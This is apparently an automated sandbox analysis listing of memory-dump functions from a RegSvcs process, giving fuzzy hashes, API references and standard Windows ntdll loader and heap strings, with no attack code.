                                                                  • Instruction ID: 692c695c7cc68b79756aefcdb935875566340c9a9bb02f34f1deefbe49f38f38
                                                                  • Opcode Fuzzy Hash: d5ea72b3ca6c77bd7e3d7db883ba6a396e724c5c4583f02cff6063621dd034ad
                                                                  • Instruction Fuzzy Hash: 7931F271A443069BD320EF29DD86E2ABBD5EF94B24F00055CF945AB391EA20EC05C7A6
                                                                  APIs
                                                                    • Part of subcall function 016D2DF0: LdrInitializeThunk.NTDLL ref: 016D2DFA
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0BA3
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0BB6
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0D60
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016D0D74
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 1404860816-0
                                                                  • Opcode ID: 2d753f4c28dbd283bafecb177c347ddd7831bbe180355c8fa4fff38e6bedf7cd
                                                                  • Instruction ID: f2a013172ff6f02180fc1bd2afe9a1b0de1a8c828fba770d5e6bfed90326de6c
                                                                  • Opcode Fuzzy Hash: 2d753f4c28dbd283bafecb177c347ddd7831bbe180355c8fa4fff38e6bedf7cd
                                                                  • Instruction Fuzzy Hash: 04424B71900715DFDB21CF68C880BAAB7F5FF44314F1445AAE989DB242E770AA85CF61
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                  • API String ID: 0-379654539
                                                                  • Opcode ID: d4dc65836bedb653c62b33aecf309268e3b50d553fe34685008fe124afdb4a66
                                                                  • Instruction ID: 749931eb6261348640c2b407ede81ec08aecd34aaacbc5cf0d643c41de7af8df
                                                                  • Opcode Fuzzy Hash: d4dc65836bedb653c62b33aecf309268e3b50d553fe34685008fe124afdb4a66
                                                                  • Instruction Fuzzy Hash: 8DC16A752083828FDB11CF98C944B6AB7E8BF85704F04896EF9958B351E734C94ACB96
                                                                  Strings
                                                                  • @, xrefs: 016C8591
                                                                  • LdrpInitializeProcess, xrefs: 016C8422
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 016C8421
                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 016C855E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-1918872054
                                                                  • Opcode ID: 76320e8989c944d7fba35a92e53166abb3ce6048acb1c833d1a4863b1409d728
                                                                  • Instruction ID: 714d31a616b18ef640033cb4663cfc3121274dedff62d008f77492ff368bbc47
                                                                  • Opcode Fuzzy Hash: 76320e8989c944d7fba35a92e53166abb3ce6048acb1c833d1a4863b1409d728
                                                                  • Instruction Fuzzy Hash: 84918A71508345AFD722DF25CC90EBBBAEDFF94A44F80492EFA8593151E370D9048B66
                                                                  Strings
                                                                  • .Local, xrefs: 016C28D8
                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017022B6
                                                                  • SXS: %s() passed the empty activation context, xrefs: 017021DE
                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017021D9, 017022B1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                  • API String ID: 0-1239276146
                                                                  • Opcode ID: f33e596360faaadf857379c44807179d295bd67df737b9158e8ecdc5f50c7f04
                                                                  • Instruction ID: d045228b009423438bfefef9461f787b3490ba2d06159391d6fb68485aba41b7
                                                                  • Opcode Fuzzy Hash: f33e596360faaadf857379c44807179d295bd67df737b9158e8ecdc5f50c7f04
                                                                  • Instruction Fuzzy Hash: F1A19932900229DBDB21CFA9CC98BA9B3B5FB58714F2541EDD908A7351D7309E81CF94
                                                                  Strings
                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01703456
                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01703437
                                                                  • RtlDeactivateActivationContext, xrefs: 01703425, 01703432, 01703451
                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0170342A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                  • API String ID: 0-1245972979
                                                                  • Opcode ID: e5474a851907876c840b094147414684e23eb035b2b8231354c9f027358fdc21
                                                                  • Instruction ID: 9b2799c9c90329e3a303d5df7e94290c37569e089bf985a06e3a287fd181c3a9
                                                                  • Opcode Fuzzy Hash: e5474a851907876c840b094147414684e23eb035b2b8231354c9f027358fdc21
                                                                  • Instruction Fuzzy Hash: ED61DB36640B129FD722CE1CCC91B3AF7E5EB80A60F16856DF9569F290DB30E801CB95
                                                                  Strings
                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 016F0FE5
                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016F10AE
                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 016F1028
                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 016F106B
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                  • API String ID: 0-1468400865
                                                                  • Opcode ID: ea9a23d2a217c6b91e1c48f2ae5f42c124ba972bd3e7c65a5b6242fe32f11f44
                                                                  • Instruction ID: 9f8af91910f36bbd2817b925b2fe4beab870dc8a2b20cc0af4886b793b474e55
                                                                  • Opcode Fuzzy Hash: ea9a23d2a217c6b91e1c48f2ae5f42c124ba972bd3e7c65a5b6242fe32f11f44
                                                                  • Instruction Fuzzy Hash: 9971EDB19043059FCB20EF18CC84B9B7BADAF95764F40456CF9498B28AD734D589CBD2
                                                                  Strings
                                                                  • LdrpDynamicShimModule, xrefs: 016FA998
                                                                  • apphelp.dll, xrefs: 016B2462
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 016FA9A2
                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 016FA992
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-176724104
                                                                  • Opcode ID: 613d2126f76c47d0dc38d33368ce21404de6de444a81bcfea3f90802a960767b
                                                                  • Instruction ID: 9268dca700a3cd38aeec3a275a9a319621abca1225f80436411a789fb84b38eb
                                                                  • Opcode Fuzzy Hash: 613d2126f76c47d0dc38d33368ce21404de6de444a81bcfea3f90802a960767b
                                                                  • Instruction Fuzzy Hash: B0318D71690201EBDB319F9DCC84EAEBBB5FB80B20F25406DFA056B345C770A982C790
                                                                  Strings
                                                                  • HEAP[%wZ]: , xrefs: 016A3255
                                                                  • HEAP: , xrefs: 016A3264
                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 016A327D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                  • API String ID: 0-617086771
                                                                  • Opcode ID: 672364950cbfa1712afa705715d6f2b98cc28aaf4c6cce93f031a8faed758495
                                                                  • Instruction ID: 1cd5dc9b23ffc7ca206fd2c19d59598e3bd00980fc679977374d79ff0db9bd4b
                                                                  • Opcode Fuzzy Hash: 672364950cbfa1712afa705715d6f2b98cc28aaf4c6cce93f031a8faed758495
                                                                  • Instruction Fuzzy Hash: FA929971A042499FDB25CFA8C8547AABBF1FF08304F58809DE94AAB352D735AD42CF50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-4253913091
                                                                  • Opcode ID: f3760aaf6bfbc07dc941e1b98f364dc331d7fe36589c1ecfbf6f44391326bc42
                                                                  • Instruction ID: c12ff052d46ff58d482f4eccc2e182e2b30a66b11542089525dd35412283011e
                                                                  • Opcode Fuzzy Hash: f3760aaf6bfbc07dc941e1b98f364dc331d7fe36589c1ecfbf6f44391326bc42
                                                                  • Instruction Fuzzy Hash: C5F19B34A00606DFEB25CF68C894B6ABBB5FF45304F5482A8E5169B396D730ED81CF90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $@
                                                                  • API String ID: 0-1077428164
                                                                  • Opcode ID: 8c292b3093c629f545efcfd3e3ba4d786c42d84cb5234efcc3edc461e6239291
                                                                  • Instruction ID: 87b50d10f3eafd7a649eca1cab6ec1978504c70bc6818805e9c5fb5ffe247898
                                                                  • Opcode Fuzzy Hash: 8c292b3093c629f545efcfd3e3ba4d786c42d84cb5234efcc3edc461e6239291
                                                                  • Instruction Fuzzy Hash: 13C26E71A083559FD725CF28CC81BABBBE5AFC8754F04892DEA8987381D734D885CB52
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                  • API String ID: 0-2779062949
                                                                  • Opcode ID: 1c86db3dc7d1ee8bc19be6178c18af6dbdad30c9dbf9639a057199f89146cbc6
                                                                  • Instruction ID: 0186883dd15d79262ae07372c4694133bf1efb66950b707a742d159e8f267638
                                                                  • Opcode Fuzzy Hash: 1c86db3dc7d1ee8bc19be6178c18af6dbdad30c9dbf9639a057199f89146cbc6
                                                                  • Instruction Fuzzy Hash: CBA19F71D112299BDB31DF68CC98BEAB7B9EF48700F1042EAD909A7210D7359E84CF54
                                                                  Strings
                                                                  • LdrpCheckModule, xrefs: 016FA117
                                                                  • Failed to allocated memory for shimmed module list, xrefs: 016FA10F
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 016FA121
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-161242083
                                                                  • Opcode ID: 73bd2d5f6caa39eb31d5ec53207111799e5423241c9b656fba04347edd4a9f5b
                                                                  • Instruction ID: 8f7fae0a2866380fdd8accc0c3851a26005a6f237ece47a9cabed8f437bc9c64
                                                                  • Opcode Fuzzy Hash: 73bd2d5f6caa39eb31d5ec53207111799e5423241c9b656fba04347edd4a9f5b
                                                                  • Instruction Fuzzy Hash: 2B71CE71A402059FDB25DFA8CD81ABEBBF5FB44714F24806DE906AB351E734A982CB50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-1334570610
                                                                  • Opcode ID: 144f49f40484355d701f7a95d195c2b67ec1d4ebc1882f9d9f7b2683edab281c
                                                                  • Instruction ID: 2f50439385bed0803616cb7bea985ebb12afa0d739c959f23ed25a6d36e268b8
                                                                  • Opcode Fuzzy Hash: 144f49f40484355d701f7a95d195c2b67ec1d4ebc1882f9d9f7b2683edab281c
                                                                  • Instruction Fuzzy Hash: D461BD716003019FDB29CF28C980B6ABBE1FF45704F54855DE95A8B396D771EC81CB91
                                                                  Strings
                                                                  • Failed to reallocate the system dirs string !, xrefs: 017082D7
                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 017082DE
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 017082E8
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-1783798831
                                                                  • Opcode ID: a5c7873f99295b52118b1d5d537fed1d3056721c64ebdab1a2b32de13c2dae77
                                                                  • Instruction ID: c046fe4d391440f4d6ddf31e1dfff51569c48983939dc5ff815606a14e0de03c
                                                                  • Opcode Fuzzy Hash: a5c7873f99295b52118b1d5d537fed1d3056721c64ebdab1a2b32de13c2dae77
                                                                  • Instruction Fuzzy Hash: C0410771584301ABC721EB68DC44B6FBBE9EF54B64F10852EF949D7290E770D800CBA6
                                                                  Strings
                                                                  • PreferredUILanguages, xrefs: 0174C212
                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0174C1C5
                                                                  • @, xrefs: 0174C1F1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                  • API String ID: 0-2968386058
                                                                  • Opcode ID: 161ba5e57b672676e39250a11cc1cc8ba8d82f480a46dd35c4f434f22d143206
                                                                  • Instruction ID: 36971d03688b40f10ff2bc8c65a037d35e6cabd24097ee402ef57c312aaca97b
                                                                  • Opcode Fuzzy Hash: 161ba5e57b672676e39250a11cc1cc8ba8d82f480a46dd35c4f434f22d143206
                                                                  • Instruction Fuzzy Hash: A6418571E05219EBDB12DED9CC51FEEFBB9BB14704F00416AE605B7240D7B49A44CB54
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                  • API String ID: 0-1373925480
                                                                  • Opcode ID: 3f11ed07691718c521a25e567bdd5a238adf297d44f36110ab78e770a73e5187
                                                                  • Instruction ID: af9829de1c5f913aa99d517c871c9aa6502ac86073813ddc44b1dab13ad4c1df
                                                                  • Opcode Fuzzy Hash: 3f11ed07691718c521a25e567bdd5a238adf297d44f36110ab78e770a73e5187
                                                                  • Instruction Fuzzy Hash: 6A41E232A04268CBEB26DBD9CC44BADFBF9FF56340F240459D902EB781D6748902CB51
                                                                  Strings
                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01714899
                                                                  • LdrpCheckRedirection, xrefs: 0171488F
                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01714888
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                  • API String ID: 0-3154609507
                                                                  • Opcode ID: 263a7e763ec1c27409100992e0987338ec7bee1d988344b7b6d507115c55d2ae
                                                                  • Instruction ID: a2a90a061c74bcba5566225cde3177258fcafd2bfa456a53e2afc609a7dd398a
                                                                  • Opcode Fuzzy Hash: 263a7e763ec1c27409100992e0987338ec7bee1d988344b7b6d507115c55d2ae
                                                                  • Instruction Fuzzy Hash: 2041D272A542519FCB22CE5DD840A26FBE5EF49B60F0905ADED4AE7319D730D800CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                  • API String ID: 0-2558761708
                                                                  • Opcode ID: 3baa124d6abc5f00e35d89d7ff213558eabed967615cac4d84798aa54760cfe5
                                                                  • Instruction ID: 34a6406b4e7f820ef15730f69ef65281c3a7b424895732a2e882dcf8c8a11d42
                                                                  • Opcode Fuzzy Hash: 3baa124d6abc5f00e35d89d7ff213558eabed967615cac4d84798aa54760cfe5
                                                                  • Instruction Fuzzy Hash: 4311DC313561029FDB29DE18CC81B6AB3A9EF41B26F18826DF507CB251DB34EC41CB99
                                                                  Strings
                                                                  • LdrpInitializationFailure, xrefs: 017120FA
                                                                  • Process initialization failed with status 0x%08lx, xrefs: 017120F3
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01712104
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-2986994758
                                                                  • Opcode ID: e806ce78dd70d00c76247f6f8dae81d34c2c8389a07ebb3834b111bda0b239b0
                                                                  • Instruction ID: cd6812291f533d13909855071b8a850e3b331b974d420989a6736a06112cc490
                                                                  • Opcode Fuzzy Hash: e806ce78dd70d00c76247f6f8dae81d34c2c8389a07ebb3834b111bda0b239b0
                                                                  • Instruction Fuzzy Hash: 26F04C74780308BFE720E60DDC57F99BB68FB41B24F20005DF60077289D5B0E940C641
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: ___swprintf_l
                                                                  • String ID: #%u
                                                                  • API String ID: 48624451-232158463
                                                                  • Opcode ID: 9407ebfaab16d493e91f226420a677dd8aaa33b262c1649f8ea64ca5b409bc6f
                                                                  • Instruction ID: e8705d2c0352b8ae47edb28f9ccb1e0b4659c98297a5b0fe0d680097528df435
                                                                  • Opcode Fuzzy Hash: 9407ebfaab16d493e91f226420a677dd8aaa33b262c1649f8ea64ca5b409bc6f
                                                                  • Instruction Fuzzy Hash: 2A712772A0114A9FDB01DFA8CD94BAEB7F9FF08704F144069EA05A7251EB34AD41CBA4
                                                                  Strings
                                                                  • LdrResSearchResource Enter, xrefs: 0169AA13
                                                                  • LdrResSearchResource Exit, xrefs: 0169AA25
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                  • API String ID: 0-4066393604
                                                                  • Opcode ID: 3f81c73c8900e982671b4ccf28721e8c5a26cb59961be2a403d8ddcc3822bf02
                                                                  • Instruction ID: 5c0f6e5504449c53e1bb4e5b66e8e07637531d21128b39801350924d258cd420
                                                                  • Opcode Fuzzy Hash: 3f81c73c8900e982671b4ccf28721e8c5a26cb59961be2a403d8ddcc3822bf02
                                                                  • Instruction Fuzzy Hash: 9EE16B71A01219ABEF22CEDDCD94BAEBBBEBB04314F10452AEA01E7355D778D941CB50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Instruction Fuzzy Hash: 7FE1B271508342CFCB15CF28C890A6ABBE5FF89318F05896DF9998B351DB31E905CB92
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d725291432ffecdc11bce2c8d8b2e9d63fcb690b436649aa1b76a331e48f3b15
                                                                  • Instruction ID: a977f82538e94beac437046ad7ca2afede44b5861f6f84238365efa965831959
                                                                  • Opcode Fuzzy Hash: d725291432ffecdc11bce2c8d8b2e9d63fcb690b436649aa1b76a331e48f3b15
                                                                  • Instruction Fuzzy Hash: 69D1F272A012169BDB14EF68CC90ABEB7FABF54304F45472DE916DB280E734E951CB60
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                  • Instruction ID: 42bbf4d7972eb4ad8a33087d2cb690492322df1e4354e677e7f2afcda986a125
                                                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                  • Instruction Fuzzy Hash: 6AB19075A00605AFDB25DF9CC940FABFBBAFF84304F14456DAA02A7798DA34E905CB11
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                  • Instruction ID: d51a2497c24c70de87323d9abca5387e782b1847319a997363337a12526d142c
                                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                  • Instruction Fuzzy Hash: 89B1F271600646AFDB25DBACCD50BBEBBF6AF84304F540199E6969B381DB30ED41CB90
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e61c8af72a047ba8d3e71155015419dd0e7aa6dd4366815577482ef3e2ea0463
                                                                  • Instruction ID: 258daa9a0b23cb47f4b260270787f2a24f428995705b3330f2da73f15dd4d626
                                                                  • Opcode Fuzzy Hash: e61c8af72a047ba8d3e71155015419dd0e7aa6dd4366815577482ef3e2ea0463
                                                                  • Instruction Fuzzy Hash: 07C15770208345CFDB64CF19C884BAAB7E9BF89744F44492DEA8987391D774E909CF92
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8321425cfbba4a9938df06b4b05e1ca4a6e6f9071e438c794eb79073bb4e07dc
                                                                  • Instruction ID: 3bb322f386d0d57cd442eec033e2f1e6207e2417553511fe52c10b1857c9646e
                                                                  • Opcode Fuzzy Hash: 8321425cfbba4a9938df06b4b05e1ca4a6e6f9071e438c794eb79073bb4e07dc
                                                                  • Instruction Fuzzy Hash: 6AB14F70A002658BDB64DF68CC90BE9B7F6EF44704F0486E9D54AA7381EB709D86CB35
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 852f801814ff52486ebb4cbb0565a4bcaa8ebf803c95625fa8ead38659e14f77
                                                                  • Instruction ID: 0ddd1fe1f2f1de4b93b2016c10e7ea1f097c4b28a973359ae757b562d6e6c2f5
                                                                  • Opcode Fuzzy Hash: 852f801814ff52486ebb4cbb0565a4bcaa8ebf803c95625fa8ead38659e14f77
                                                                  • Instruction Fuzzy Hash: DAA10832E006299FEB21DB58CC84FEEBBA5BB01714F1501A9EB11AB391D7749D81CBD1
                                                                  Memory Dump Source
